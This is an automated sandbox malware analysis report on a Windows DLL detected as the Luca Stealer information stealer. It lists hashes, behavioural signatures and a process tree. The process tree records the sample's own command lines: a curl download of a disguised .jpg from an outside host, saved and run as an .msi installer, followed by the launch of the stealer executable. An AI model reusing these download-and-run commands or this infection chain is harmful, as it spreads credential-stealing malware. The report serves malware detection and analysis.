Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Sample Name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Analysis ID:756307
MD5:977f29431f9233f22f51b3d27e8abc28
SHA1:7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256:b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags:exe
Infos:

Detection

Luca Stealer
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Luca Stealer
Queries memory information (via WMI often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 1096 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 68 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6056 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • cmd.exe (PID: 6020 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • curl.exe (PID: 6088 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • cmd.exe (PID: 5180 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • msiexec.exe (PID: 4792 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 6000 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 6012 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 6080 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 6096 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 5804 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 1668 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 4696 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 5272 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 2764 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 1708 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5260 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 1400 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4272 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 1916 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5104 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 4988 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4968 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 4780 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5396 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 5444 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 5292 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3928 cmdline: "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 2140 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: UIServices.exe PID: 3560JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
    Process Memory Space: UIServices.exe PID: 5736JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      Process Memory Space: UIServices.exe PID: 3928JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results